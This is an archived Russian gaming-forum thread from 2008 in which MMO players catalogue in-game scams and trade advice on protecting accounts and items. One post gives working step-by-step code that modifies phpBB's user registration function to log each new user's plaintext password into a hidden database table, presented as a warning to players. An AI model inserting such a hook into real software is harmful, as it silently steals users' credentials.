Просмотр полной версии : Кидалы в игре
Страницы :
[
1]
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
FLUherrAD
13.07.2008, 17:39
Кидал много и они есть во всех проектах.Этот не исключение.Топ пишу в связи с увиденным мной вопросом на форуме,связанным с киданием.
1)Кидание во время торговли.
Например,если вы не умеете торговать,и ИГРОК-КИДАЛА хочет что-либо у вам продать или купить.ИГРОК-КИДАЛА попросит вас выставить сумму,которую он хочет получить за вещь,которую он якобы вам продаст,или вещь,за которую он должен будит отдать деньги.Сам он конешно же ничего выставлять не будит в окне торговли,а на ваш вопрос,почему так происходит,скажет,что это глюк или что это так и должно быть.
2)Кидание с помощью втирания в доверие.
Не надо давать вещи,своим виртуальным знакомым по игре.Какие бы они вам слова не говорили.Не слушайте женских персонажей,которые говорят вам,что вы пусечка.Не слушайте мужиков,которые хотят надарить вам в реале цветов.Если ктото просит вас дать погонять золотую пушку,или чтото типа того,даже если потом обещает дать за это деньги,не слушайте.Это развод.
3)Кидание через сайты.
В игре часто можно увидеть бегающих персонажей не высокого левла,часто кричащих про то,что они продают игровые деньги за реальные,например,за 1 золотой можно купить,например,180000 игровых денег.Или зарегистрируйтесь и получите 10 з в подарок.Главное здесь,будит объявление о том,что для этого надо зарегистрироваться на сайте каком-либо.И главное условие регистрации будит таким,что ваш ник будит совпадать с вашем ником в игре.Тоже самое с малоизвестными кланами.На их клансайтах тоже скорее всего вас попросят зарегистрироваться под своим игровым ником.Будьте аккуратнее с выбором клана!
4)Кидание через семью админа.
Например вам пишет в приват какойнибудь игрок,с ником типа Admin,Administrator Nival_Online,PWO.Он конешноже представится или самим админом,или его папой,бабушкой,внуком и т.п.Семья админская большая.Ну и он вам говорит,хотите чтоб вашего чара не забанили,платите мне игровой валютой,или,скорее всего,попросит ваш пароль от вашего персонажа.Только помните,что администрации ваш пароль не нужен.
5)Кидание через прокачку шмота.
Опятьже какойто игрок,чаще всего ядреный нуб без одежды,предлагает вам сделать из вашего обыденного сеорого шмота чтото фиолетовое.Или даже золотое.Для этого ему надо дать ваше оружие и всегото какихнибудь 10000 игровых денег.Сам он конешноже все деньги потратил на прокачку этой профы...а может он опятьже брат админа)Ну собственно и все,больше вы ваш шмот не увидите.
6) Если какой-то игрок предлагает вам поменять или купить вещь через торг, кинул вам группу, вы кладете вещь и он резко закрывает окно, то ваша вещь может упасть на землю. Если вы ее подбираете, то есть шанс, что она упадет не вам, а ему, т.к. вы находитесь в группе. Если вещь ушла не вам, можете сказать ей прощай.
__________________________________________________ ________________________________________
Для таких как я...МНОГОБУКАВНЕЧИТАЮЩИХ)
Что вы должны делать,чтоб вас не кинули.
1)Будьте внимательны во время торговли.Научитесь пользоваться этой возможностью правильно прежде чем торговать.
2)Не давайте ваши вещи в аренду.Не давайте ваши вещи игровым знакомым,какимибы хорошими они не казались.
3)Не регистрируйтесь на сайтах под своим логином и паролем.Ни на каких.
4)Админестрация не будит вам писать ничего по поводу проверок.Она вобще вам в игре ничего писать не будит.Некогда им.И уж тем более им НЕ НУЖНЫ ваши пароли.
5)Никому не давайте ваше оружие или шмот.Его упрут.Чтобы вам не говорили.
Есть еще много способов обокрасть обычных игроков.Я описал только самые частовстречающиеся.Пожалуйста дополняйте топ)Буду рад
ЗЫ:Хотите узнать о способах кидания еще,пришлите мне на почту 100000;)
ЗЗЫ:Шутка)
Terramorpher
13.07.2008, 18:01
Если не уверены в честности партнёра - продавайте ему вещи не через обмен, а через кота.
(открываете магазин, выставляете продаваемую вещь по своей цене и не читаете чат пока не купят)
Правда так только на деньги вещи менять можно...
DallasXIII
13.07.2008, 20:15
В PW кинуть при обмене могут только самых прожженных нубов, ибо прикручено двойное подтверждение обмена. Ну а что можно взять у нубов? 100 денег?
1 - ничего не понял
3 - что случится если я зарегюсь на какомнибуть сайте под темже ником, что и в игре - да ничего не может случиться (возможно имелось в виду логин?)
4,5 -причем здесь семья аднимов - это всеже не фришка какаянибудь (хотя если человек дурак ... )
Slipstream
13.07.2008, 20:47
...
3 - что случится если я зарегюсь на какомнибуть сайте под темже ником, что и в игре - да ничего не может случиться (возможно имелось в виду логин?)
...
У некоторых ник и логин аккаунта - одинаковые.
Да вы пишите,пишите)злюки)Кидал на вас нету))
Почему нету? Уже столкнулись с один сайтом...
FLUherrAD
13.07.2008, 20:51
Slipstream,нутк и я о томже)поэтому и написал.В моем первом проекте меня по тоупому кинули при торговле.1й способ.Я вобщемто не дурак.И так кинул меня вроде хорошо одетый игрок из топклана на тот момент.Я ему поверил,а потом только руками разводил.Остался без дорогущей брони.
итак: мошенники они же кидалы могут скрысить ваш ШМОТ под предлогом того типа пишет вам в личку чтото "хочеш покажу баг?""Баг на раздвоение шмота хош покажу?"
он кинет пати с " ГРУПОВЫМ ЛУТОМ!!" и скажет вам "неск раз брось шмот и подними" и когда 2-3ий раз вы поднимите шмот он рандомно упадет мошеннику( для "доверия" он скажет типа я отойду подальше чтоб ты знал что не я не возьму)
Terramorpher
13.07.2008, 22:44
он кинет пати с " ГРУПОВЫМ ЛУТОМ!!" и скажет вам "неск раз брось шмот и подними" и когда 2-3ий раз вы поднимите шмот он рандомно упадет мошеннику( для "доверия" он скажет типа я отойду подальше чтоб ты знал что не я не возьму)
Вообще-то, если вы с ним качаетесь в пати, он законно может потребовать от вас какой-либо лут.
Так что это не кидалово, а просто шутка...
Смысл кидать человека который вас качает/саппортит на каче?!
Slipstream
13.07.2008, 22:49
Вообще-то, если вы с ним качаетесь в пати, он законно может потребовать от вас какой-либо лут.
Этож где такой "закон", что можно что-то требовать? Если качаешся с кем-то в пати и по корейскому/китайскому рандому лут попал не тебе - всё что ты можеш, это попросить.
1.кто говорил о каче!?разводит человек всех на шмот *** ему кач в пати?
2. ну вот самого высоколвльного чара твоего к примеру разденут ты посмеешся?
3. читай №1
Arrancari
14.07.2008, 00:27
Смысл кидать человека который вас качает/саппортит на каче?!Думаю фраза "требовать" тут не уместна Х_х Попросить... а чо требовать - челу может самому надо))) Да и бессмысленно - он даже от дуэли потом может отказаться и слинять в реал))
А насчет "качает/саппортит" в данном случае вообще не было. Просто два чела стояли и один другого разводил ХD
-----
Был у меня не то что развод в игре... просто неприятная ситуация. Подружке яйцо кровью и потом добытое передавала. И тут одна сцука подбегает... ну вы поняли))) И в реал. Бывают же в жизни такие)))
Rinoa1337
14.07.2008, 00:35
если мы с ним качаемся то требовать он ничего не вправе, как упало, так и упало.
если он саппорт\качает, то это уже другой вопрос
именно поэтому я всегда один (с) warcraft3 TFT или с друзьями из реала
Arrancari
14.07.2008, 00:38
именно поэтому я всегда один (с) warcraft3 TFT или с друзьями из реалаПо мне это не выход - всегда набираю одноразовую команду на месте - ведь если ждать сидку-подругу, на другом конце мире, которая сама чо-то там делает, это убится можно)))
А так - объединился, чтоб легче сильных мачить, и свалил. Все просто и красиво Х_Х Ах да, не забываем сказать спасибо ХDDD
Правда я тут подумала... Сама ведь почти никогда не набираю - не пристало девушке за танками бегать и на помощь звать ))) Так что частенько с питомцем на пару бью, пока не пригласят)))
З.Ы. Е-мое, это был злостный оффтоп. В тему: кидалы - уроды. Вот.
Народ, вы немного забылись. Кидают посредством пати лута, разводя на "показ бага" или "раздвоение вещи". И пати создают специальн. А кач тут не причем.
категорически не согласна с пунктом - не регистрируйтесь на сайтх под игровыми никами
акк - один
ник - другой
а если вы делаете одинаково то простите....
на клановых сайтах просят регится под игровым ником не потому что обокрасть хотят а что бы не сидеть и думать - ху из этот вася пупкин - то ли пусик из клана то ли рыжик
Rinoa1337
14.07.2008, 12:14
это исключительно потому что редко встречаются сайты не на бесплатных хостингах типо юкозы или боже упаси народа :) почти в любом форуме можно сделать "отображаемое имя" и дополнительные поля вроде "раса" "класс" "гнильдия" да и вообще какие угодно
the_beginner
14.07.2008, 13:03
Был у меня не то что развод в игре... просто неприятная ситуация. Подружке яйцо кровью и потом добытое передавала. И тут одна сцука подбегает... ну вы поняли))) И в реал. Бывают же в жизни такие)))
Через землю лучше ничего не передавать. Человек может просто не знать что вы меняетесь - бывает так что рюкзак полный и выкинешь какую-нить необработанную древесину или агератум чтобы взять нефрит упавший с моба - и стоишь чатишься - а кто-то подберет твое дерево - ну и что. Что лежит на земле то ничье.
Передавать друзьям через кота лучше только в данже или если рядом никого на версту нет - тк при такой передаче цена выставляется в 1 золотой - равноценно тому что через землю передавать.
Торг/сделка служит для этой цели лучше всего. Передача идет из рук в руки, никакой налог не взимается :) И, если правильно использовать двойное подтверждение то можно даже с незнакомыми людьми меняться. При любом изменении на столе (типа если он захочет незаметно что-то убрать) кнопка ОК "отжимается" и ты ее можешь нажать только когда тебя все устраивает. Потом можешь посмотреть внимательно (а вдруг убрал-таки гад за доли секунды до того как ты нажал(а) OK) и если все нормально то нажимать кнопку "торг". Все продумано до мелочей - действительно Perfect.
Надурить могут только если не знаешь как пользоваться ("так и должно быть", "баг покажу",...). Вовсе неочевидно что если человек докачался до 30 ур скажем то он уже пользовался сделками. Думаю на таких можно жаловаться админам, тк "играйте честно и не создавайте препятствий другим игрокам".
Думаю самый распространенный вид мошенничества в игре - продажа по неразумным ценам. Я не раз видел как коты продают разорванные шкуры и руки Будды по 400-500 (не знаю правда как он у них идет), красный нефрит по 500 (этот идет явно тк многие забывают что его можно не только выбивать но и покупать у НПЦ), рупоры по 10-15k,... Как покупают нектар по 20-30 (не удивлюсь если они же рядом продают его по 2-3k). Кто не знает реальной цены тот купит.
PS. А просветите меня нуба чем именно чревата регистрация на сайте с тем же логином (с другим паролем естественно) что и ник в игре, или с тем же что и логин в игру.
Slipstream
14.07.2008, 14:22
...
PS. А просветите меня нуба чем именно чревата регистрация на сайте с тем же логином (с другим паролем естественно) что и ник в игре, или с тем же что и логин в игру.
После регестрации на каком-то "нехорошем" сайте автор такого сайта заходит твоим персом в игру и делает с ним всё что хочет(можно назвать лучшим вариантом, остается голый перс) или меняет пароль на аккаунт.
VeseliyRoger
14.07.2008, 16:01
К слову о разводах. Я когда - то давно читал про разводы в играх. Об админах. Если подходит человек, представляется админом и просит деньги/предмет/и т.д. ПОД ЛЮБЫМ ПРЕДЛОГОМ. НЕ СОГЛАШАЙТЕСЬ! Админ может легко "нарисовать" себе в игре любой предмет, и ему нет смысла унижаться и просить его у нубов. Ещё есть люди, которые любят подначивать игрока. (Это не относится к игре ПВ, но может кому и пригодится) Он ходит за вами и постоянно оскорбляет. Вы на него нападаете, и он (уже на законных основаниях - как обороняющийся) вас убивает и (в зависимости от игры) забирает ваши предметы. Если вспомню ещё или найду тот самый журнал напишу ещё.
Можно региться под игровым ником на клансайтах (представляю какая путаница будет в любом клане, если каждый соклан будет регица под другим ником). Фигня в том, что ЛОГИН и НИК ЧАРЫ не должны совпадать. ну пароль, ессесно, лучше не повторять. даже если боитесь забыть - он восстанавливается.
По-поводу продажи за неразумные деньги - это не кидалово, это бизнес. Если дурак и купишь руку будды за 1к (магаз по 120 их скупает) - твои проблемы. Это не кидалово. Кидалово если тебюе эту руку будды продают под видом зхаточки на шмот или чего-то еще. В конце-концов спецом есть форум, где написано (если поискать поиском), что руки будды, порваный мех, пыль элемнталя - сдавать в магаз.
А вот еще способ. Если на предмете, который вы выбили с мобов написано что это просто ОСТАНКИ ТВАРЕЙ - в магаз. Если написано - ОСТАНКИ ТВАРЕЙ, ИСПОЛЬЗУЮТСЯ ДЛЯ КВЕСТА ИСКАТЕЛЬ ДРАКОНОВ - желательно оставить, помоему не сложная система.
ЗЫ а если оскорбляет и провоцирует вас на пк (а сздаи стоит хайлевл-друг) - лучший способ умника в свой черный список)
myrkiska1
14.07.2008, 17:37
Я пришла из Ро и добавляю еще два способа разводов.
1.С тобой начинают дружить и после нескольких совместных походов спрашивают твою почту или аську типа пришлют прикол,сами понимаете что после получения прикола все ваши логины(где вы на каких сайтах побывали),пароли,переписка аськи(имено все логи аськи,кто не умеет не пишите что не возможно,видела своими глазами),номера карт и т.д. оказывается достоянием мошенника.
2.Создают ник какого либо топового или игрока из нормальной гильдии(и не пишите что это невозможно,можно заменить буквы и сдвоить в запале и не заметят)далее пишут кому нибудь из гильдии этого игрока,типа я сейчас к тебе нубом подбегу дай шмота и т.д. побегать.
ЗЫ.по поводу клансайтов,была такая ситуация,ты регистрируешься и любой админ этого сайта знает твой IP, собственно как и его друзья и подружки.И если админ такого сайта школьник,то не исключено если на твой ящик(как правило обязателен ящик для подтверждения регистрации) будут писать гадости и слать вирусы и т.д.
В Ро был случай когда забанили всю гилду за такие вещи.
какие прицыпы что бы не попасть в просак)
1.пароль и логин должны быть разные и не советую их сохранять на других сайтах ведь обычно люди пользуються одним и тем жем паролем
2.если что-то продаёте то провате за ту игровую что в игре Тоесть за игровые деньги
3.ХАЛЯВЫ НЕ ГДЕ НЕТУ.. кто вам говорит что там есть халява это развод)
вариатов масса оно одно всегда едино это дай мне шмот или что-то другое)) или посмотреть короче сами думаете)
По поводу регистрации.
На всяких юкозах и прочих хостингах, где можно создать форум, но нельзя править скрипты ниче страшного в том, что вы зарегистрируетесь под игровым аккаунтом и введете от него пароль НЕТ. Смотреть базы паролей администратору форума (юзеру, зарегистрировшему форум) никто НЕ даст! Да и пароли там как минимум в md5() шифруются.
А вот на хостингах, где владелец может заливать свои скрипты я бы оставить игровой пасс не рискнул :D
the_beginner
14.07.2008, 18:33
По-поводу продажи за неразумные деньги - это не кидалово, это бизнес. Если дурак и купишь руку будды за 1к (магаз по 120 их скупает) - твои проблемы. Это не кидалово. Кидалово если тебюе эту руку будды продают под видом зхаточки на шмот или чего-то еще. В конце-концов спецом есть форум, где написано (если поискать поиском), что руки будды, порваный мех, пыль элемнталя - сдавать в магаз.
Бизнес (англ business, от busy, занят) - это какое-нибудь полезное занятие.
1. Вот если допустим в некой деревне есть кузнец но нет торговца, ты можешь побежать в соседний город, купить там нефрита, потом вернуться в эту деревню, стать котом возле кузнеца и продавать вдвое дороже (или сколько там по науке можно в этом случае брать) - и это будет бизнес - ты сэкономил людям деньги на телепорте или время, и получаешь свои деньги. Молодец.
2. Если ты просто пришел на рынок, скупил все дерево по 300, и стоишь продаешь его по 3000 - то это уже не бизнес, это спекуляция на искуственно тобой же созданном дефиците. Хотя многие тут будут кричать что это бизнес. Только это не бизнес, тк пользы ты при этом никакой не приносишь а деньги берешь. Тупо живешь за чужой счет, кровосос.
3. А если ты тупо продаешь руки будды которые никак нельзя заюзать (по крайней мере на данный момент) то это надувательство. Даже если ты при этом не пишешь людям "купите, дешеГо отдаю, забирайте последние, я щас комп выключаю и ухожу". А если пишешь то и подавно.
А вот еще способ. Если на предмете, который вы выбили с мобов написано что это просто ОСТАНКИ ТВАРЕЙ - в магаз. Если написано - ОСТАНКИ ТВАРЕЙ, ИСПОЛЬЗУЮТСЯ ДЛЯ КВЕСТА ИСКАТЕЛЬ ДРАКОНОВ - желательно оставить, помоему не сложная система.
Ну это не только два возможных варианта.
На руках будды например написано что обладают магической силой. Примерно то же самое написано и на некоторых камнях (обладают магической силой, многие коллекционеры их скупают).
Я пришла из Ро и добавляю еще два способа разводов.
1.С тобой начинают дружить и после нескольких совместных походов спрашивают твою почту или аську типа пришлют прикол,
А еще мобильный могут спросить :) Девушка, с Вами так просто познакомиться пытаются :)
сами понимаете что после получения прикола все ваши логины(где вы на каких сайтах побывали),пароли,переписка аськи(имено все логи аськи,кто не умеет не пишите что не возможно,видела своими глазами),номера карт и т.д. оказывается достоянием мошенника.
Да, такие приколы тоже возможны (я не умею но знаю на 100%). Надо на винду ставить апдейты, файервол, антивирус, нельзя запускать EXE-шники которые приходят по почте,... А то злобные хакеры сломают, независимо от того играете вы вообще в ПВ или нет, и украдут все что можно. Хотя конечно чел по которому видно что он в игру вложил $200, для хакера хорошая цель.
Но как правило дать человеку свою почту ничем не чревато.
ЗЫ.по поводу клансайтов,была такая ситуация,ты регистрируешься и любой админ этого сайта знает твой IP, собственно как и его друзья и подружки.И если админ такого сайта школьник,то не исключено если на твой ящик(как правило обязателен ящик для подтверждения регистрации) будут писать гадости и слать вирусы и т.д.
В Ро был случай когда забанили всю гилду за такие вещи.
IP-адрес скорее имеет отношение к предыдущему пункту. Зная IP можно сломать, если есть дыры. Но сломать могут и не зная про игру - просто насканят компов с дырами и ломают.
А спам приходит на E-mail. И если админ ламер (школьники тут ни причем, сейчас такие школьники есть что как раз комп тебе сломают), то твой E-mail будет доступен спамботам которые собирают адреса на вебсайтах. И через некоторое время на этот адрес начнет приходить спам. Поэтому сейчас у любого человека есть минимум 2 адреса - один для общения а второй для всяких там регистраций.
После регестрации на каком-то "нехорошем" сайте автор такого сайта заходит твоим персом в игру и делает с ним всё что хочет(можно назвать лучшим вариантом, остается голый перс) или меняет пароль на аккаунт.
Ну... допустим если я зарегистрировался на его сайте то он узнает мой логин. Но ему же будет мало логина для того чтобы войти в игру - надо же еще пароль знать. Или можно как-то без пароля, по одному логину только входить?
Если пароль я только в игре набираю, причем с использованием графической клавы (это по идее сделано для того чтобы кейлоггеры перехватывать, но я не уверен после некоторых сообщений на этом форуме что реализация правильная и от кейлоггеров как-то спасает), то как злобный автор "нехорошего" сайта узнает мой пароль чтобы войти и поизмываться над персом?
the_beginner
14.07.2008, 18:51
По поводу регистрации.
На всяких юкозах и прочих хостингах, где можно создать форум, но нельзя править скрипты ниче страшного в том, что вы зарегистрируетесь под игровым аккаунтом и введете от него пароль НЕТ. Смотреть базы паролей администратору форума (юзеру, зарегистрировшему форум) никто НЕ даст! Да и пароли там как минимум в md5() шифруются.
А вот на хостингах, где владелец может заливать свои скрипты я бы оставить игровой пасс не рискнул :D
1. Нигде никогда свой пароль оставлять нельзя. Ни в почте, ни в КПК, ни в SMS на мобильном, ни особенно на совершенно левых сайтах при регистрации. Пароль должен быть отдельным и хорошим (кстати myrkiska1, может у тебя пароль на компе был "123"? тогда хакеру и дыры не нужны).
Конкретно на Юкозе, насколько я знаю (сам не смотрел) можно ставить свои скрипты. И уж наверняка там можно получить бакап базы. И на многих шареных хостингах (платных) можно читать чужие скрипты и брать из них пароль и ходить по чужой базе. Никогда нигде пароли светить нельзя!
2. Простой md5-хеш простого (только маленькие буквы) пароля длиной 8 символов сейчас ломается меньше чем за сутки полным перебором (без использования словаря либо таблиц). См например http://www.postgresql.org/docs/8.3/static/pgcrypto.html "Table F-20. Hash algorithm speeds". Сорри за технические детали - общий смысл такой что пароль от игры можно вводить только в игре и нигде больше.
1. Нигде никогда свой пароль оставлять нельзя. Ни в почте, ни в КПК, ни в SMS на мобильном, ни особенно на совершенно левых сайтах при регистрации. Пароль должен быть отдельным и хорошим (кстати myrkiska1, может у тебя пароль на компе был "123"? тогда хакеру и дыры не нужны).
Конкретно на Юкозе, насколько я знаю (сам не смотрел) можно ставить свои скрипты. И уж наверняка там можно получить бакап базы. И на многих шареных хостингах (платных) можно читать чужие скрипты и брать из них пароль и ходить по чужой базе. Никогда нигде пароли светить нельзя!
2. Простой md5-хеш простого (только маленькие буквы) пароля длиной 8 символов сейчас ломается меньше чем за сутки полным перебором (без использования словаря либо таблиц). См например http://www.postgresql.org/docs/8.3/static/pgcrypto.html "Table F-20. Hash algorithm speeds". Сорри за технические детали - общий смысл такой что пароль от игры можно вводить только в игре и нигде больше.
Еще раз повторяю, что на общеизвестных форумных хостингах вам доступ к базе данных никто не даст. Максимум что сможете сделать - сменить пароль.
Про md5 я написал, что минимум. Да и часто ли пароли придумывают только из маленьких латинских букв? Хотя не спорю, уже есть довольно большие базы по тому же md5. А если юзер использовал ПРОСТОЙ пароль из латинских маленьких и больших букв и циферги, то что табличка говорит? 3 года :)
Если не хранить пароли в компьютере, кпк и т.д. проще убиццо. Это я вполне серьезно, паранойя вроде не лечится, так Вики говорит :)
myrkiska1
14.07.2008, 23:02
Сразу на все вопросы:
1.В РО я была в топе первых игроков в своем классе.
2.На юкозе любые пароли вынимаются в 5 минут(расказывать как не буду,а то много новых экспериментаторов появится)
3.Я математик,так что ставлю как пароль уравнения(да да как в не родись красивой))))
4.Разговор не о том где у кого какие дыры, а о том чтобы не раскрывать свою беспомощность перед мошенниками.
5.Знаю еще кучу способов разводов,так как в РО была своя гилд и помогала многим нубам,когда их вскрывали.
6.По поводу регистрации на сайтах гилд,не рекомендую регистрироваться когда администратор школьник,так как была свидетелем печальных событий(ИМХО)
7.По поводу екзешников,сейчас рукописный хороший вирус шифруют другим способом,сама писать не умею,но видела в действии.Патрошит комп полностью,всю инфу вплоть до всех логов переписок,и всех документов которые когда либо были написаны на компе.Такой вирус не определяет ни касперский ни другой антивирусник,и потом только убивать комп,т.е. на металалом его.
Так что лучше перебздеть чем покупать новый комп.По этому вопросу в дискусию вступать не буду,так как технически этого вопроса не знаю,но своими глазами видела.(распотрошили не меня)
ЗЫ.в РО дважды ломали практически всех игроков,вытащили базу сайта официалки, потом через 2 года взломали все топовые гильдии,потом была диверсия одного забаненого игрока он взломал игру,так что там происходили невообразимые вещи.При разделе фан форума игры(когда владельцы не поделили таньгу) на раинфо и рагинфо ушла база всех зарегистрированых и потом опять были масовые взломы.Насколько я знаю были судебные процессы так как там ушли реальные деньги с карточек у людей.
Если этого пока нет ,то не значит что не будет.Играет ведь много людей способных вливать реал,а значит это лакомый кусочек для мошенников.
Ну под логином на клан сайтах регится и не просят! Просят регится под ником в игре! Ну а уж если у вас ник в игре и логин совпадают уже тогда боятся нечего регестрироватся!))))
DarkRommel
15.07.2008, 13:21
Это игровой момент.. И если тебя кинули- знач ты лопух.. я вообще привык доверять людям и меня еще тут не раз не обманывали... много знакомых
the_beginner
15.07.2008, 15:25
Ну под логином на клан сайтах регится и не просят! Просят регится под ником в игре! Ну а уж если у вас ник в игре и логин совпадают уже тогда боятся нечего регестрироватся!))))
А если и не совпадают, то чего бояться?
(если с другим паролем естественно)
я вообще привык доверять людям и меня еще тут не раз не обманывали... много знакомых
Кстати меня тоже ни разу. А то еще почитает кто-то все эти ужастики и играть не захочет...
Всё кидалово основанно на невнимательности, внимательных не - кинут, невнимательных - кинут, но в дальнейшем они начнут смотреть что и зачем делают... ну а тех кто не думает и не хочет, тех будут кидать каждый раз...
А поповоду убить железо программой... чисто гипотетически, можно написать программулину которая отключит охлаждение?
crew3333
15.07.2008, 19:09
много писали, но не увидел самого главного фактора, помогающему действовать кидалам - элементарная человеческая жадность. Именно побуждаемый жадностью человек ведется на развод и кидают исключительно людей которые ведутся на халяву и т.п.
Много писали про то,что если на "нехороших" сайтах зарегистрироватся под своим логином,то вскроют акк,это не верно,но вот,если пароль совпадет,то очень может быть,а про то,что на укозе админ не может смотреть регистрацию - это истинна.но если админу надо,то регистрация будет идти не на укоз.а сразу ему на мыло поверьте это не так сложно делать.
Вывод - пароль для входу в игру не дублировать нигде,знать его должны только вы,в остальном хакнуть очень сложно.
Но как сказал один очень серьезный человек:"Любая защита для опытного человека - это только вопрос времени,если вас решили хакнуть,то вас хакнут"
P.S.Цитатку немного изменил,в оригинале было обворовать,но и тут подходит в принципе.
HeroMafia
16.07.2008, 10:35
Кхм...честно признаюсь кидал когдато людей в л2....каюсь!! Само легко человека развести это внушить ему(не прямой речью понятно) что вы сам нуб. К примеру я хотел получить там Б дагер (среднее оружее более-менее) и предлагал за это А Меч (уже получе) Человек понятно в восторге что он нашел такого лоха и что ему за его мусор предлагают дело и готов идти на все....а дальше уже дело техники.
Кстати наглядный пример, как угнать пароль на форуме клана "МегаСуперКлан.ru".
Для примера используется хостинг с поддержкой php, mysql и бесплатный форум phpbb (уже мало чем уступает форумам vBulletin).
Для начала в базе данных создаем таблицу (например h_userpass) с тремя полями (id, login,password).
В phpmyadmin:
1) id - тип:int, длина значения:у нас будет 3, дополнительно:auto_increment, и делаем её первичной.
2,3) login,password - тип можно поставить text
Жмакаем "Сохранить".
Теперь в /includes/functions_user.php в функцию user_add (в phpbb3.0.2 строка 152) добавляем вот такую запись:
$h_userpass = mysql_query("INSERT INTO h_userpass (id,login,password) VALUES (NULL, '$_POST[username]', '$_POST[new_password]')");
И как ни странно это ВСЕ! :)
Как удобно для себя вывести инфу из БД писать не буду, тут все просто да и не по теме.
P.S. Данный пример был написан для того, что бы понять (тем, кто не знает) как легко регистрируясь на форуме какого либо клана с использованием игровых логина и пароля можно легко потерять своего персонажа и все его ценности.
Будте внимательны!
Немного скринов:
1) functions_user (http://img.maryno.net/images/697d1730dc1d91c8747b9fb9c79c7ce6.png)
2) БД структура (http://img.maryno.net/images/9d0737bf6e221cd5d6c6f42ac690bede.png)
3) БД результат (http://img.maryno.net/images/8d0db718472708a939784446a0ec926c.png)
в бытность мою ГМом в некоей ммо, доступ к логам был только у админов, которым в основном некогда заниматься такими вещами. Но впринципе это зависит от кол-ва человек в администрации.
з.ы. Что то подсказывает мне, люди которых кидают в игре форум не читают... )
HeroMafia
16.07.2008, 18:45
я вот еще тут нубец я воть не знаю можно ли тут выкидывать на землю предметы и можно ли тут делать масс телепорт если можно тогда нада предостеречь от еще 1 вида кидания..
Rinoa1337
16.07.2008, 19:01
можно
нельзя
FLUherrAD
17.07.2008, 10:16
Чтобы доказать виновность когото,скринов недостаточно.Надо вводить заверения сделок администрацией,только в таких сделках,вор будит являться вором.А если вас развели и у вас есть скрины,это не доказательства...может вы специально все так подстроили...Это все как у страховщиков)
VeseliyRoger
17.07.2008, 10:33
я вот еще тут нубец я воть не знаю можно ли тут выкидывать на землю предметы
Предметы лучше передавать через Сделку.
Далее. Не знаю, писали это или нет, но способ уничтожать кидал есть. Если уверен, что какой - нибудь господин N - кидала, нужно написать об этом на весь мир. Это предостережёт остальных. Но, пока я таких сообщений не видел.
SafronOFF
17.07.2008, 11:01
Предметы лучше передавать через Сделку.
Далее. Не знаю, писали это или нет, но способ уничтожать кидал есть. Если уверен, что какой - нибудь господин N - кидала, нужно написать об этом на весь мир. Это предостережёт остальных. Но, пока я таких сообщений не видел.
Как мило. Скажи свой ник в игре, я сегодня куплю рупоры и немного покричу!!!
Вот так на примере твоего способа, я докажу, что можно и невиновного легко заклеймить.
Способ действительно есть. Он 1.
ПРОСТО БЫТЬ УМНЕЕ. Больше никак не спасешься от развода и кидания.
Darkprorok
17.07.2008, 14:59
ДА мне кажеться что эти правила уж СОВСЕМ ! Только полный нуб может попасться на такие разводы .
the_beginner
17.07.2008, 15:03
Чтобы доказать виновность когото,скринов недостаточно.Надо вводить заверения сделок администрацией,только в таких сделках,вор будит являться вором.А если вас развели и у вас есть скрины,это не доказательства...может вы специально все так подстроили...Это все как у страховщиков)
Да ну какие заверения и скрины. Скрины - не доказательство. Тем более что все умеют фотошопить. Повторяю/разъясняю мысль:
На серверах как правило бывают логи. Это такие файлики где сервер оставляет записи о всех действиях игроков.
То есть админ (либо ГМ либо как писали выше человек с правами root/Administrator на сервере) может:
1. Просмотреть кто с кем о чем чатился.
2. Просмотреть все сделки совершенные между двумя игроками.
3. Просмотреть когда создавались пати, кто че выкидывал на землю, кто подбирал, кому оно доставалось.
4. Посмотреть IP-адреса с которых коннектились какие пользователи (например если кидала 1 уровня Петя потом безвозмездно передал предмет хаю-нагибатору Вове с того же IP то понятно что банить реально надо Вову а не Петю. Хотя нужно проверить не NAT ли это и не чатились ли о чем-нибудь Вова и Петя - может они просто друзья с одной локалки).
То есть в случае если пользователь Вася жалуется на пользователя Петю о том что тот его развел, админ (технически) может посмотреть что было, и решить развод это или нет, посмотреть куда ушел предмет, и принять меры. Без заверения сделок администрацией. Без скринов.
Но понятно что это требует серьезных трудозатрат со стороны администрации, думаю минимум 15 минут потратит админ на разбор каждого случая. А если наказание не будет серьезным то случаев будет масса. И будут ошибки с никами и вообще тупые жалобы типа "памагите миня киданули. вася." И ошибки и несправедливые наказания при таком "разбирательстве" возможны. И даже если услуга будет платной то вполне возможно что кидала в игру вносит больше чем все его жертвы вместе взятые. Поэтому вовсе неочевидно, что администрация станет разбирать подобные случаи.
А возможно данный конкретный сервер вообще не ведет таких логов или они отключены.
Вот я и интересуюсь - может кто пробовал решать так свои проблемы. Получилось или послали.
Я вообще не понимаю какое кидалово может быть в этой игре? Самый дорогой шмот золотой, фиолетовый, желтый и одевается он минимум с 20-22 левела, у лоулвл денег, чтоб приобрести его, нет! Если только за реал, но очень сомневаюсь, что людей вложивших реальные деньги в игру возможно развести хоть каким-нибудь способом. Кому нужен обычный шмот? И не думаю, что кто-либо сильно расстроится от потери, только наука будет на будущее. А уж кто попался на удочку после 30 левла и выше - либо идиот, либо перса купил или подарили.
В Л2 допустим продавали гемстоуны выдавая их за СОП (вроде так называлось), сдесь же похожих проблем нет, единственное мечи летательные в нубской деревне продаются
А вот взлом ака, это гораздо большая проблема. А кидалы или разводилы всегда будут, лучше 1 раз попасться и больше не повторять своих ошибок.
FLUherrAD
20.07.2008, 21:53
Да ну какие заверения и скрины. Скрины - не доказательство. Тем более что все умеют фотошопить. Повторяю/разъясняю мысль:
На серверах как правило бывают логи. Это такие файлики где сервер оставляет записи о всех действиях игроков.
То есть админ (либо ГМ либо как писали выше человек с правами root/Administrator на сервере) может:
1. Просмотреть кто с кем о чем чатился.
2. Просмотреть все сделки совершенные между двумя игроками.
3. Просмотреть когда создавались пати, кто че выкидывал на землю, кто подбирал, кому оно доставалось.
4. Посмотреть IP-адреса с которых коннектились какие пользователи (например если кидала 1 уровня Петя потом безвозмездно передал предмет хаю-нагибатору Вове с того же IP то понятно что банить реально надо Вову а не Петю. Хотя нужно проверить не NAT ли это и не чатились ли о чем-нибудь Вова и Петя - может они просто друзья с одной локалки).
То есть в случае если пользователь Вася жалуется на пользователя Петю о том что тот его развел, админ (технически) может посмотреть что было, и решить развод это или нет, посмотреть куда ушел предмет, и принять меры. Без заверения сделок администрацией. Без скринов.
